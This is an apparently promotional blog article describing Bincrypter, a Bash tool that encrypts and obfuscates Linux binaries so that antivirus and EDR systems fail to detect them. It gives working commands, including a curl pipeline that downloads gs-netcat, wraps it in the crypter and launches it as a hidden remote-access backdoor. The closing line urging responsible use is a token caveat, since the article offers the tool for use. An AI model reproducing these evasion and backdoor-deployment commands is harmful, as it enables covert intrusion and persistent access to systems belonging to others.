Hacking Tools

Bincrypter : Enhancing Linux Binary Security through Runtime Encryption And Obfuscation

Bincrypter is a powerful Linux binary runtime crypter written in BASH. It is designed to obfuscate and encrypt ELF binaries and #!-scripts, providing a robust layer of protection against reverse engineering and detection by antivirus and endpoint detection and response (EDR) systems.

Key Features Of Bincrypter

  • Obfuscation and Encryption: Bincrypter can encrypt and obfuscate any ELF binary or #!-script, making it difficult for attackers to reverse-engineer the code. The resulting binary is heavily obfuscated, with strings appearing as garbage, which complicates analysis.
  • AV/EDR Evasion: The tool employs morphing techniques to change the binary’s signature every time it is executed. This makes it challenging for AV/EDR systems to detect the binary as malicious, as its signature is always different.
  • In-Memory Operation: Bincrypter operates entirely in memory without creating temporary files. This ensures that the filesystem remains clean and reduces the risk of leaving behind evidence of its use.
  • Multi-Layer Encryption: It supports double or triple encryption of the same binary, further enhancing its security features. This allows for multiple layers of protection against unauthorized access.
  • Architecture Agnostic: Bincrypter is compatible with various architectures, including x86_64, aarch64, arm6, and mips. This versatility makes it suitable for use across different platforms.
  • Living Off the Land (LOTL): The tool relies only on standard system tools like /bin/sh, perl, and openssl, which are typically available on most Linux systems. This approach minimizes dependencies and makes it easier to deploy in various environments.

To use Bincrypter, you can download the script from GitHub and execute it with the binary you want to encrypt. Here’s an example:

bash# Download the script
curl -SsfL https://github.com/hackerschoice/bincrypter/raw/refs/heads/main/bincrypter.sh -o bincrypter.sh
chmod +x bincrypter.sh

# Encrypt the 'id' binary
cp /usr/bin/id id
./bincrypter.sh id

# Optionally, set a custom password
cp /usr/bin/id id
./bincrypter.sh id foobar

Bincrypter can be used in scenarios where maintaining the integrity and confidentiality of binaries is crucial. For instance, it can be used to install backdoors with unique signatures, making them harder to detect:

bashcurl -SsfL "https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)" | PASSWORD="foobar" ./bincrypter.sh >gsnc
chmod +x gsnc
PASSWORD="foobar" GS_ARGS="-ilD -s ChangeMe" ./gsnc

Bincrypter is a versatile tool for protecting Linux binaries from reverse engineering and detection.

Its ability to operate in memory, support multiple encryption layers, and evade AV/EDR systems makes it a valuable asset in maintaining binary security.

However, like any powerful tool, it should be used responsibly and ethically.

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Recent Posts

Install MySQL on Ubuntu 20.04: Setup, Security, and Root Access

MySQL is the most popular open-source relational database management system. It is fast, reliable, and a…

7 hours ago

Install Git on Ubuntu 20.04: Apt, Source, and Configuration

Git is the most widely used version control system in the world. It was created by…

7 hours ago

Install Go on Ubuntu 20.04: Download, Setup, and First Program

Go (also called Golang) is an open-source programming language built by Google. It is designed to…

7 hours ago

Install VS Code on Ubuntu 20.04: Snap Package and Apt Guide

Visual Studio Code (VS Code) is an open-source code editor developed by Microsoft. It is one…

7 hours ago

Install Nginx on Ubuntu 20.04: Setup, Firewall, and Config Guide

Nginx (pronounced "engine x") is an open-source, high-performance web server and reverse proxy. It is used…

8 hours ago

Install Apache on Ubuntu 20.04: Setup and Virtual Host Guide

Apache is one of the most widely used open-source web servers in the world. It is…

1 day ago